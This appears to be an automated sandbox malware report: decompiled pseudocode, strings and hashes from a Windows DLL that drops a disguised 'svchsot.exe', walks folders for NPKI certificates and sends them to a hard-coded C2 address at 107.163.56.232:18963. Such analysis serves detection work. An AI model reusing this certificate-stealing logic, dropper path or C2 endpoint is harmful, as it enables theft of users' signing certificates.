						 *(_t55 + _t29 * 2 - 0x80) =  *(_t55 + _t29 * 2 - 0x80) << 0xa5;
						asm("cld");
						asm("invalid");
						 *_t29 =  *_t29 + 1;
						__eflags =  *_t29;
						_t43 = 0x40;
						__eflags = 0;
						_t31 = memset( &_v263, 0, _t43 << 2);
						asm("stosw");
						asm("stosb");
						0x10041377();
						wsprintfA( &_v264, "%s.%d", _a8, _t31);
						return  *_t38(_a8,  &_v264, 1);
					}
					_push("self");
					L4:
					_push(0);
					return L10004139(_t39, _t47, _t59, _t60);
				}
				_push(_t52);
				goto L4;
			}

APIs

Sleep.KERNEL32(?,00000000,00000000,?,cmd.exe,100168D4,751443E0,00000000), ref: 100043A6
Sleep.KERNEL32(000003E8), ref: 100043E5

Strings

QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LnZpcg==, xrefs: 100043BF
QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LmV4ZQ==, xrefs: 100043A8, 100043AD, 100043CB
self, xrefs: 1000437E
cmd.exe, xrefs: 1000435C, 10004362, 10004370

Memory Dump Source

Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd

Similarity

API ID: Sleep
String ID: QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LmV4ZQ==$QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LnZpcg==$cmd.exe$self
API String ID: 3472027048-2620343502
Opcode ID: f80a028ce0456d96c9013e9b422283649f837558aaaf319a9c805c80896dde91
Instruction ID: b27527e00d161eb54cfb38a31ab8197fa4e33b6488c85d147b80e3c5571d821e
Opcode Fuzzy Hash: f80a028ce0456d96c9013e9b422283649f837558aaaf319a9c805c80896dde91
Instruction Fuzzy Hash: CF0126B64043547AFA11B778EC86F8F3B4CDF452E1F110422F94469089CEB9AA808665

Uniqueness

Uniqueness Score: -1.00%

Function 10004630 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 102
libraryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E10004630(void* __edx, void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v275;
				char _v276;
				void _v535;
				char _v536;
				char _v812;
				signed char _v856;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t47;
				void* _t53;
				intOrPtr _t57;
				void* _t59;
				signed int _t66;
				signed int _t68;
				void* _t70;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t77;
				void* _t78;
				void* _t80;
				void* _t87;

				_t87 = __fp0;
				_t70 = __edx;
				_t66 = 0x40;
				_v536 = 0;
				memset( &_v535, 0, _t66 << 2);
				asm("stosw");
				asm("stosb");
				E1000CD0E(0,  &_v536);
				E1000CD08(0,  &_v536);
				_t80 = _t78 + 0x1c;
				_t47 =  &_v536;
				0x10031a18(_t47,  &_v856, "\\*.*", _a4);
				asm("insd");
				_v12 = _t47;
				if(_t47 != 0xffffffff) {
					_push(_t75);
					do {
						_t68 = 0x40;
						_t73 =  &_v275;
						_v276 = 0;
						memset(_t73, 0, _t68 << 2);
						_t74 = _t73 + _t68;
						asm("stosw");
						asm("stosb");
						wsprintfA( &_v276, "%s\\%s", _a4,  &_v812);
						_push(_a12);
						_t53 = E1000CD02(0, _t75);
						_t80 = _t80 + 0x20;
						_t75 = _t77 + _t53 - 0x10f;
						if((_v856 & 0x00000010) == 0) {
							_v16 = 0;
							_v8 = 0;
							_t57 = E10004564(0, _t70, __eflags, _t87,  &_v8,  &_v276,  &_v16);
							_t80 = _t80 + 0xc;
							__eflags = _t57;
							if(__eflags == 0) {
								goto L9;
							}
							__eflags = _v8;
							if(__eflags == 0) {
								goto L9;
							}
							E1000CBDC(_a8, _t75, _v8, _v16);
							E1000CCA8(0, 0, _t70, _t74, _t75, _t77, __eflags, _t87, _v8);
							L8:
							_t80 = _t80 + 0x14;
							goto L9;
						}
						_t85 = _v812 - 0x2e;
						if(_v812 == 0x2e) {
							goto L9;
						}
						E1000CBF7(_a8, _t75);
						E10004630(_t70, _t85, _t87,  &_v276, _a8, _a12);
						goto L8;
						L9:
						_push( &_v856);
						_push(_v12);
						_t59 = E100272CF(0, 0, _t70, _t74, _t75, _t77, _t85);
						asm("clc");
					} while (_t59 != 0);
					0x10035c27(_t74, _v12);
					return _t59;
				}
				return _t47;
			}

APIs

LdrInitializeThunk.NTDLL ref: 1000466E
wsprintfA.USER32 ref: 100046C3

Strings

%s\%s, xrefs: 100046BD
\*.*, xrefs: 10004668
., xrefs: 100046E4

Memory Dump Source

Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd

Similarity

API ID: InitializeThunkwsprintf
String ID: %s\%s$.$\*.*
API String ID: 2324811901-2210278135
Opcode ID: d5e4eedee033a2c652017d97775e2094c93dc4010f01f3d435e3a7d7f1b5221c
Instruction ID: d326f81f7ac9fe77124f283db77ffe5160f1302aaf38353be2e3603f90d865f5
Opcode Fuzzy Hash: d5e4eedee033a2c652017d97775e2094c93dc4010f01f3d435e3a7d7f1b5221c
Instruction Fuzzy Hash: F0316FB6C0025CBAEF12DFA4CC45EDE7B7CEB09280F1104A6F618A6051DB319B989B51

Uniqueness

Uniqueness Score: -1.00%

Function 1000800C Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 158
sleepCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E1000800C(void* __eax, char __ebx, void* __ecx, void* __edx, char* __edi, intOrPtr* __esi, void* __fp0) {
				void* _t60;
				int _t61;
				intOrPtr* _t64;
				intOrPtr* _t73;
				intOrPtr _t75;
				void* _t83;
				void* _t91;
				void* _t93;
				intOrPtr _t98;
				char _t102;
				signed int _t106;
				void* _t113;
				void* _t119;
				void* _t122;
				void* _t130;
				intOrPtr* _t131;
				void* _t133;
				void* _t134;
				void* _t141;
				char* _t147;

				_t151 = __fp0;
				_t132 = __esi;
				_t123 = __edi;
				_t122 = __edx;
				_t103 = __ecx;
				_t102 = __ebx;
				 *((intOrPtr*)(__eax - 0x18))();
				asm("cli");
				_push("\\");
				_push(_t133 - 0x294);
				 *__esi();
				_push(_t133 - 0x4ac);
				_push(_t133 - 0x294);
				 *__esi();
				_t60 = _t133 - 0x4ac;
				_push(_t60);
				_push("NPKI");
				_push(_t60);
				_t61 = E100254F0(__ebx, __ecx, __edx, __edi, __esi);
				if(_t61 != 0) {
					_push(_t133 - 0x294);
					L10007F4F(__edx);
					_pop(_t103);
				} else {
					_t106 = 0x3f;
					 *((char*)(_t133 - 0x5d8)) = __ebx;
					memset(_t133 - 0x5d7, _t61, _t106 << 2);
					asm("stosw");
					asm("stosb");
					_push(0x100165b0);
					E10003EF4(_t133 - 0x5d8, "%s\\%s", _t133 - 0x294);
					_push(_t133 - 0x5d8);
					 *((intOrPtr*)(E10022125(_t133 - 0x5d8, __ebx, 0, _t122, __esi, __fp0) - 0xbfffffff)) =  *((intOrPtr*)(E10022125(_t133 - 0x5d8, __ebx, 0, _t122, __esi, __fp0) - 0xbfffffff)) + E10022125(_t133 - 0x5d8, __ebx, 0, _t122, __esi, __fp0) - 0xbfffffff;
					_t73 =  *0x8e85700;
					 *_t73 =  *_t73 + _t73;
					 *((intOrPtr*)(_t133 - 0x10)) = _t73;
					_t75 = E10004770(_t133 - 0x294, 0x850fc085, _t122, _t133 - 0x5d7 + _t106, __fp0, _t133 - 0x294, _t73, _t133 - 0x5d7 + _t106);
					_push(0x1f);
					 *((intOrPtr*)(_t133 - 0xc)) = _t75;
					 *((char*)(_t133 - 0x90)) = _t102;
					memset(_t133 - 0x8f, 0, 0x850fc085 << 2);
					asm("stosw");
					asm("stosb");
					_push(0x1f);
					 *((char*)(_t133 - 0x190)) = _t102;
					memset(_t133 - 0x18f, 0, 0 << 2);
					asm("stosw");
					asm("stosb");
					_t113 = 0x1f;
					_t130 = _t133 - 0x10f;
					 *((char*)(_t133 - 0x110)) = _t102;
					memset(_t130, 0, 0 << 2);
					_t131 = _t130 + _t113;
					asm("stosw");
					asm("stosb");
					 *((intOrPtr*)(_t133 - 8)) = 0x50;
					_t83 = E10005C4C(_t133 - 0x110, 0x80);
					_t141 = _t134 + 0x1c - 1 + 0x3c;
					if(_t83 == 0) {
						_push( &M1001258F);
					} else {
						_push(_t133 - 0x109);
					}
					E1000CD0E(0, _t133 - 0x90);
					0x1003775b();
					_push(0x2f);
					_push(_t133 - 0x90);
					if( *_t131() != 0) {
						 *((char*)( *_t131(_t133 - 0x90, 0x2f))) = _t102;
					}
					_t123 =  *_t131(_t133 - 0x90, 0x3a);
					_pop(_t119);
					if(_t123 != _t102) {
						 *_t123 = _t102;
						_t98 = E1000CD0E(_t119, _t133 - 0x190);
						_t123 = _t123 + 1;
						_t147 = _t123;
						0x100354a4(_t122, _t123, _t133 - 0x90);
						_t141 = _t141 + 0xc;
						 *((intOrPtr*)(_t133 - 8)) = _t98;
					}
					_push( *((intOrPtr*)(_t133 - 0xc)));
					_push( *((intOrPtr*)(_t133 - 0x10)));
					_push( *((intOrPtr*)(_t133 - 8)));
					_t91 = E10001000(_t119, _t147, _t151, "L2ltYWdlLnBocA==");
					_pop(_t103);
					_push(_t91);
					_push(_t133 - 0x190);
					_t93 = E10007E03(_t102, _t103, _t123, _t132, _t147, _t151);
					_t134 = _t141 + 0x14;
					_t148 = _t93;
					if(_t93 != 0) {
						_push(_t102);
						_push(_t133 - 0x5d8);
						E1002E0E4(_t103, _t122, _t123, _t132, _t148);
						_pop(es);
					}
					 *0x10017b90 = 1;
					Sleep(0xbb8);
				}
				_t64 = _t133 - 0x4d8;
				0x10036154(_t122,  *((intOrPtr*)(_t133 - 4)), _t64);
				 *((intOrPtr*)(_t133 + 0x15840fc0)) =  *((intOrPtr*)(_t133 + 0x15840fc0)) + _t64;
				 *((intOrPtr*)(_t64 +  *_t64 - 0x4ab43)) =  *((intOrPtr*)(_t64 +  *_t64 - 0x4ab43)) + _t64 +  *_t64;
			}

0x1000800c
0x1000800c
0x1000800c
0x1000800c
0x1000800c
0x1000800c
0x10008010
0x10008013
0x1000801e
0x10008023
0x10008024
0x1000802c
0x10008033
0x10008034
0x10008036
0x1000803c
0x1000803d
0x10008042
0x10008043
0x1000804c
0x100081e9
0x100081ea
0x100081ef
0x10008052
0x1000805a
0x1000805b
0x10008061
0x10008063
0x10008065
0x1000806c
0x1000807e
0x1000808c
0x1000809c
0x1000809e
0x100080a4
0x100080a7
0x100080b2
0x100080b7
0x100080b9
0x100080c5
0x100080cb
0x100080cd
0x100080cf
0x100080d0
0x100080db
0x100080e3
0x100080e5
0x100080e7
0x100080e8
0x100080eb
0x100080f1
0x100080f7
0x100080f7
0x100080f9
0x100080fb
0x10008108
0x1000810f
0x10008114
0x10008119
0x10008124
0x1000811b
0x10008121
0x10008121
0x10008130
0x10008135
0x10008143
0x10008145
0x1000814c
0x1000815a
0x1000815c
0x10008168
0x1000816d
0x1000816e
0x10008176
0x10008180
0x10008185
0x10008185
0x10008188
0x1000818d
0x10008190
0x10008190
0x10008193
0x10008196
0x10008199
0x100081a1
0x100081a6
0x100081a7
0x100081ae
0x100081af
0x100081b4
0x100081b7
0x100081b9
0x100081c1
0x100081c2
0x100081c3
0x100081c8
0x100081c8
0x100081ce
0x100081d8
0x100081d8
0x10007fc8
0x10007fd3
0x10007fd7
0x10007fdf

APIs

Sleep.KERNEL32(00000BB8), ref: 100081D8

Strings

NPKI, xrefs: 1000803D
107.163.56.232:18963/main.php, xrefs: 10008124
%s\%s, xrefs: 10008078
L2ltYWdlLnBocA==, xrefs: 1000819C

Memory Dump Source

Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd

Similarity

API ID: Sleep
String ID: %s\%s$107.163.56.232:18963/main.php$L2ltYWdlLnBocA==$NPKI
API String ID: 3472027048-2092272908
Opcode ID: c010f2aaaa450455edcfe454f18eb8f6808ed7547a3d97b836d84193e7231879
Instruction ID: 0f1f9c0d47637e2dd1cb31eff19b899711e0bc4e543d466f80a7974f01d04c09
Opcode Fuzzy Hash: c010f2aaaa450455edcfe454f18eb8f6808ed7547a3d97b836d84193e7231879
Instruction Fuzzy Hash: 9F51627680425DAEEB51D7B4DC45BEE7BBCFB08251F1404E6E648E6181EB709B888F11

Uniqueness

Uniqueness Score: -1.00%

Function 1000C3AB Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 466
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E1000C3AB(signed int* __ecx, void* __edx, void* __fp0, intOrPtr _a4, signed int _a7, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a19) {
				signed int _v8;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				signed char _v25;
				char _v26;
				char _v27;
				char _v28;
				signed int _v32;
				char _v33;
				char _v44;
				char _v56;
				signed int _v62;
				signed int _v66;
				signed char _v74;
				char _v334;
				char _v594;
				signed int _v598;
				char* _v602;
				char* _v606;
				char _v866;
				intOrPtr _v870;
				signed int _v874;
				short _v876;
				short _v878;
				signed short _v880;
				signed int _v884;
				intOrPtr _v888;
				intOrPtr _v892;
				char _v896;
				signed int _v900;
				signed int _v904;
				signed int _v908;
				unsigned int _v912;
				signed int _v914;
				signed int _v916;
				short _v918;
				char _v920;
				char _v1180;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t185;
				signed int _t186;
				char _t193;
				signed int _t198;
				char _t207;
				char _t209;
				char _t214;
				char _t216;
				char _t218;
				char _t221;
				char _t223;
				signed int _t231;
				signed int _t233;
				char _t240;
				intOrPtr _t245;
				signed int _t249;
				intOrPtr _t251;
				void* _t252;
				signed int _t256;
				signed int _t261;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t274;
				signed int _t285;
				signed int* _t286;
				void* _t287;
				signed int _t288;
				signed int _t289;
				void* _t292;
				void* _t296;
				void* _t297;
				void* _t298;
				void* _t299;
				void* _t300;
				void* _t301;
				void* _t302;
				void* _t303;
				void* _t304;
				signed int _t309;
				signed int _t311;
				void* _t323;
				intOrPtr _t334;
				signed int _t339;
				void* _t340;
				char* _t341;
				signed int _t342;
				intOrPtr _t343;
				signed int* _t346;
				void* _t347;
				void* _t348;
				void* _t349;
				void* _t350;
				void* _t354;

				_t354 = __fp0;
				_t323 = __edx;
				_t290 = __ecx;
				_t346 = __ecx;
				if(__ecx[4] != 0) {
					return 0x40000;
				}
				__eflags = __ecx[9];
				if(__ecx[9] == 0) {
					__eflags =  *__ecx;
					_t334 = _a16;
					_v32 = 0;
					if( *__ecx != 0) {
						__eflags = _t334 - 4;
						if(_t334 != 4) {
							_v32 = 0xc;
						}
					}
					_push(_a4);
					E1000CD0E(_t290,  &_v1180);
					__eflags = _v1180;
					_pop(_t292);
					if(_v1180 == 0) {
						L89:
						return 0x10000;
					}
					_t185 =  &_v1180;
					do {
						__eflags =  *_t185 - 0x5c;
						if( *_t185 == 0x5c) {
							 *_t185 = 0x2f;
						}
						_t185 = _t185 + 1;
						__eflags =  *_t185;
					} while ( *_t185 != 0);
					__eflags = _t334 - 4;
					_a19 = _t334 == 4;
					__eflags = _a19;
					if(_a19 == 0) {
						L15:
						_t16 =  &_a7;
						 *_t16 = _a7 & 0x00000000;
						__eflags =  *_t16;
						L16:
						__eflags = _a19;
						_v8 = 8;
						if(__eflags != 0) {
							L18:
							_v8 = 0;
							L19:
							__eflags = _t334 - 2;
							if(_t334 != 2) {
								__eflags = _t334 - 1;
								if(_t334 != 1) {
									__eflags = _t334 - 3;
									if(_t334 != 3) {
										__eflags = _t334 - 4;
										if(__eflags != 0) {
											goto L89;
										}
										_t293 = _t346;
										_t186 = E1000C0F9(0, _t346, _t323, _t334, __eflags);
										L27:
										__eflags = _t186;
										if(_t186 != 0) {
											L90:
											return _t186;
										}
										_push(0x10017b9c);
										_v62 = 0;
										E1000CD0E(_t293,  &_v866);
										_push( &_v1180);
										E1000CD0E(_t293,  &_v594);
										_push( &_v594);
										_t193 = E1000CD02(_t293, _t346);
										_t349 = _t348 + 0x14;
										__eflags = _a7;
										_v896 = _t193;
										if(_a7 != 0) {
											_push("/");
											E1000CD08(_t293,  &_v594);
											_t35 =  &_v896;
											 *_t35 = _v896 + 1;
											__eflags =  *_t35;
											_pop(_t293);
										}
										_push(0x10017b9c);
										E1000CD0E(_t293,  &_v334);
										__eflags =  *_t346;
										_v598 = 0;
										_v884 = 0;
										_v74 = 1;
										_v66 = 0;
										_v878 = 0;
										_v920 = 0xb17;
										_v918 = 0x14;
										_v912 = _t346[0x18];
										_v908 = 0;
										_v916 = 8;
										if( *_t346 != 0) {
											__eflags = _a19;
											if(_a19 == 0) {
												_v916 = 9;
											}
										}
										_v876 = _v916;
										_t198 = _v8;
										__eflags = _t198;
										_v914 = _t198;
										if(_t198 != 0) {
											L36:
											_v904 = 0;
											goto L37;
										} else {
											_t274 = _t346[0x19];
											__eflags = _t274;
											if(_t274 < 0) {
												goto L36;
											}
											_v904 = _t274 + _v32;
											L37:
											_v900 = _t346[0x19];
											_v874 = _t346[0x11];
											_v880 = _v880 & 0x00000000;
											_v25 = _v25 & 0x00000000;
											_v870 = _t346[5] + _t346[3];
											_v606 =  &_v28;
											_v602 =  &_v56;
											_v23 = _t346[0x14];
											_t296 = 8;
											_v892 = 0x11;
											_v888 = 9;
											_v28 = 0x55;
											_v27 = 0x54;
											_v26 = 0xd;
											_v24 = 7;
											_t207 = E1000CEF0(_t346[0x14], _t296, _t346[0x15]);
											_v22 = _t207;
											_t297 = 0x10;
											_t209 = E1000CEF0(_t346[0x14], _t297, _t346[0x15]);
											_v21 = _t209;
											_t298 = 0x18;
											_v20 = E1000CEF0(_t346[0x14], _t298, _t346[0x15]);
											_v19 = _t346[0x12];
											_t299 = 8;
											_t214 = E1000CEF0(_t346[0x12], _t299, _t346[0x13]);
											_v18 = _t214;
											_t300 = 0x10;
											_t216 = E1000CEF0(_t346[0x12], _t300, _t346[0x13]);
											_v17 = _t216;
											_t301 = 0x18;
											_t218 = E1000CEF0(_t346[0x12], _t301, _t346[0x13]);
											_t285 = _t346[0x17];
											_v16 = _t218;
											_v15 = _t346[0x16];
											_t302 = 8;
											_t221 = E1000CEF0(_t346[0x16], _t302, _t285);
											_v14 = _t221;
											_t303 = 0x10;
											_t223 = E1000CEF0(_t346[0x16], _t303, _t285);
											_v13 = _t223;
											_t304 = 0x18;
											_t332 = _t285;
											_v12 = E1000CEF0(_t346[0x16], _t304, _t285);
											_t101 =  &_v28; // 0x55
											_push(9);
											_push( &_v56);
											E1000CD50( &_v56, _t346);
											_push(_t346);
											_push(E1000BCE1);
											 *((char*)(_v602 + 2)) = 5;
											_push( &_v920);
											_t231 = E1000AED1(_t304);
											_t350 = _t349 + 0x18;
											__eflags = _t231;
											if(_t231 == 0) {
												_t109 = _v896 + 0x1e; // 0x2f
												_t233 = _v892 + _t109;
												_t346[5] = _t346[5] + _t233;
												__eflags = _t346[4];
												if(_t346[4] == 0) {
													_t339 =  *_t346;
													_t286 =  &(_t346[0xa]);
													__eflags = _t339;
													 *_t286 = 0x12345678;
													_t346[0xb] = 0x23456789;
													_t346[0xc] = 0x34567890;
													if(_t339 == 0) {
														L44:
														__eflags =  *0x10017fa4;
														if( *0x10017fa4 == 0) {
															0x10037ff5(_t233);
															0x10031c8a();
															 *_t286 =  *_t286 ^ 0xe85057f8;
															asm("insd");
															asm("pushad");
															__eflags = _t233 +  *_t233;
														}
														_t340 = 0;
														__eflags = 0;
														do {
															 *((char*)(_t347 + _t340 - 0x28)) = rand() >> 7;
															_t340 = _t340 + 1;
															__eflags = _t340 - 0xc;
														} while (_t340 < 0xc);
														_v33 = _v912 >> 8;
														_t287 = 0;
														__eflags = 0;
														do {
															_t341 = _t347 + _t287 - 0x28;
															_t240 = E1000B8A2(__eflags,  &(_t346[0xa]),  *((intOrPtr*)(_t347 + _t287 - 0x28)));
															_t287 = _t287 + 1;
															__eflags = _t287 - 0xc;
															 *_t341 = _t240;
														} while (__eflags < 0);
														_t288 = 0;
														__eflags =  *_t346;
														if( *_t346 == 0) {
															L56:
															__eflags = 0;
															L57:
															__eflags = _a19;
															_t346[9] = 0;
															if(_a19 != 0) {
																_t342 = _v8;
																_t346[0x20] = _t288;
																L64:
																_t346[9] = _t346[9] & 0x00000000;
																E1000C233(_t346);
																_t309 = _t346[0x20];
																_t186 = _t346[4];
																_t346[5] = _t346[5] + _t309;
																__eflags = _t186;
																if(_t186 != 0) {
																	goto L90;
																}
																__eflags = _t288;
																if(_t288 != 0) {
																	L80:
																	return 0x400;
																}
																_t333 = _t346[0x1b];
																_t245 = _v32 + _t309;
																_v908 = _t346[0x1b];
																__eflags = _v904 - _t245;
																_v904 = _t245;
																_t310 = _t309 & 0xffffff00 | _v904 == _t245;
																__eflags = _t346[6] - _t288;
																_v900 = _t346[0x19];
																if(_t346[6] == _t288) {
																	L75:
																	__eflags = _v914 - _t342;
																	if(_v914 != _t342) {
																		L78:
																		return 0x4000000;
																	}
																	__eflags = _t342;
																	if(_t342 != 0) {
																		L79:
																		_push(_t346);
																		_push(E1000BCE1);
																		_push( &_v920);
																		_t249 = E1000B113(_t310);
																		__eflags = _t249;
																		if(_t249 == 0) {
																			_t169 =  &(_t346[5]);
																			 *_t169 = _t346[5] + 0x10;
																			__eflags =  *_t169;
																			_v916 = _v876;
																			L82:
																			_t186 = _t346[4];
																			__eflags = _t186;
																			if(__eflags != 0) {
																				goto L90;
																			}
																			_t251 = E1000CCAE(_t186, _t288, _t310, _t333, _t342, _t346, _t347, __eflags, _t354, _v888);
																			_push(_v888);
																			_t343 = _t251;
																			_push(_v602);
																			_push(_t343);
																			_t252 = E1000CD50(_t251, _t346);
																			_v602 = _t343;
																			_t289 = E1000CCAE(_t252, _t288, _t310, _t333, 0x35e, _t346, _t347, __eflags, _t354, 0x35e);
																			_push(0x35e);
																			_push( &_v920);
																			_push(_t289);
																			E1000CD50( &_v920, _t346);
																			_t256 = _t346[0xf];
																			__eflags = _t256;
																			if(_t256 != 0) {
																				while(1) {
																					_t311 =  *(_t256 + 0x35a);
																					__eflags = _t311;
																					if(_t311 == 0) {
																						break;
																					}
																					_t256 = _t311;
																				}
																				 *(_t256 + 0x35a) = _t289;
																				L88:
																				return 0;
																			}
																			_t346[0xf] = _t289;
																			goto L88;
																		}
																		goto L80;
																	}
																	__eflags = _t310;
																	if(_t310 != 0) {
																		goto L79;
																	}
																	goto L78;
																}
																__eflags =  *_t346 - _t288;
																if( *_t346 == _t288) {
																	L69:
																	__eflags = _v916 & 0x00000001;
																	_v914 = _t342;
																	if((_v916 & 0x00000001) == 0) {
																		_t158 =  &_v916;
																		 *_t158 = _v916 & 0x0000fff7;
																		__eflags =  *_t158;
																	}
																	_t312 = _t346;
																	_v876 = _v916;
																	_t261 = E1000BDCB(_t346, _v870 - _t346[3]);
																	__eflags = _t261;
																	if(_t261 == 0) {
																		L74:
																		return 0x2000000;
																	} else {
																		_push(_t346);
																		_push(E1000BCE1);
																		_push( &_v920);
																		_t264 = E1000AED1(_t312);
																		__eflags = _t264;
																		if(_t264 != 0) {
																			goto L80;
																		}
																		_t310 = _t346;
																		_t265 = E1000BDCB(_t346, _t346[5]);
																		__eflags = _t265;
																		if(_t265 != 0) {
																			goto L82;
																		}
																		goto L74;
																	}
																}
																__eflags = _a19 - _t288;
																if(_a19 == _t288) {
																	goto L75;
																}
																goto L69;
															}
															_t342 = _v8;
															__eflags = _t342 - 8;
															if(_t342 != 8) {
																__eflags = _t342;
																if(_t342 != 0) {
																	goto L64;
																}
																_t266 = E1000C354(_t354);
																L60:
																_t288 = _t266;
																goto L64;
															}
															_t266 = E1000C272(_t346, _t332, _t347, _t354,  &_v920);
															goto L60;
														}
														__eflags = _a19;
														if(_a19 == 0) {
															E1000BCE1(_t346,  &_v44, 0xc);
															_t350 = _t350 + 0xc;
															_t128 =  &(_t346[5]);
															 *_t128 = _t346[5] + 0xc;
															__eflags =  *_t128;
														}
														__eflags =  *_t346 - _t288;
														if( *_t346 == _t288) {
															goto L56;
														} else {
															__eflags = _a19;
															if(_a19 != 0) {
																goto L56;
															}
															_push(1);
															_pop(0);
															goto L57;
														}
													} else {
														goto L42;
													}
													while(1) {
														L42:
														_t233 =  *_t339;
														__eflags = _t233;
														if(_t233 == 0) {
															goto L44;
														}
														_t233 = E1000B834(_t286, _t233);
														_t339 = _t339 + 1;
														__eflags = _t339;
														if(_t339 != 0) {
															continue;
														}
														goto L44;
													}
													goto L44;
												}
												E1000C233(_t346);
												return _t346[4];
											}
											E1000C233(_t346);
											goto L80;
										}
									}
									_push(_a12);
									_t293 = _t346;
									_push(_a8);
									_t186 = E1000C049(0, _t346, _t334);
									goto L27;
								}
								_push(_a12);
								_t293 = _t346;
								_push(_a8);
								_t186 = L1000BF37(_t185, _t346, _t323);
								goto L27;
							}
							_t293 = _t346;
							_t186 = E1000BEBF(_t346, _t323, _a8);
							goto L27;
						}
						_t185 = E1000B8C7(_t292, __eflags,  &_v1180);
						__eflags = _t185;
						if(_t185 == 0) {
							goto L19;
						}
						goto L18;
					}
					_push( &_v1180);
					_t185 = E1000CD02(_t292, _t346);
					__eflags =  *((char*)(_t347 + _t185 - 0x499)) - 0x2f;
					_pop(_t292);
					if( *((char*)(_t347 + _t185 - 0x499)) == 0x2f) {
						goto L15;
					}
					_a7 = 1;
					goto L16;
				} else {
					return 0x50000;
				}
			}

0x1000c3ab
0x1000c3ab
0x1000c3ab
0x1000c3b6
0x1000c3be
0x00000000
0x1000c3c0
0x1000c3ca
0x1000c3ce
0x1000c3da
0x1000c3dc
0x1000c3df
0x1000c3e2
0x1000c3e4
0x1000c3e7
0x1000c3e9
0x1000c3e9
0x1000c3e7
0x1000c3f0
0x1000c3fa
0x1000c3ff
0x1000c407
0x1000c408
0x1000c9ab
0x00000000
0x1000c9ab
0x1000c40e
0x1000c414
0x1000c414
0x1000c417
0x1000c419
0x1000c419
0x1000c41c
0x1000c41d
0x1000c41d
0x1000c422
0x1000c425
0x1000c429
0x1000c42d
0x1000c44c
0x1000c44c
0x1000c44c
0x1000c44c
0x1000c450
0x1000c450
0x1000c454
0x1000c45b
0x1000c46e
0x1000c46e
0x1000c471
0x1000c471
0x1000c474
0x1000c482
0x1000c485
0x1000c496
0x1000c499
0x1000c4aa
0x1000c4ad
0x00000000
0x00000000
0x1000c4b3
0x1000c4b5
0x1000c4ba
0x1000c4ba
0x1000c4bc
0x1000c9b4
0x1000c9b4
0x1000c9b4
0x1000c4cd
0x1000c4cf
0x1000c4d2
0x1000c4dd
0x1000c4e5
0x1000c4f0
0x1000c4f1
0x1000c4f6
0x1000c4f9
0x1000c4fd
0x1000c503
0x1000c50b
0x1000c511
0x1000c516
0x1000c516
0x1000c516
0x1000c51d
0x1000c51d
0x1000c524
0x1000c526
0x1000c52e
0x1000c531
0x1000c538
0x1000c53e
0x1000c545
0x1000c548
0x1000c54f
0x1000c558
0x1000c561
0x1000c567
0x1000c56d
0x1000c576
0x1000c578
0x1000c57c
0x1000c57e
0x1000c57e
0x1000c57c
0x1000c58e
0x1000c595
0x1000c598
0x1000c59a
0x1000c5a1
0x1000c5b7
0x1000c5b7
0x00000000
0x1000c5a3
0x1000c5a3
0x1000c5a6
0x1000c5a8
0x00000000
0x00000000
0x1000c5af
0x1000c5bd
0x1000c5c3
0x1000c5cc
0x1000c5db
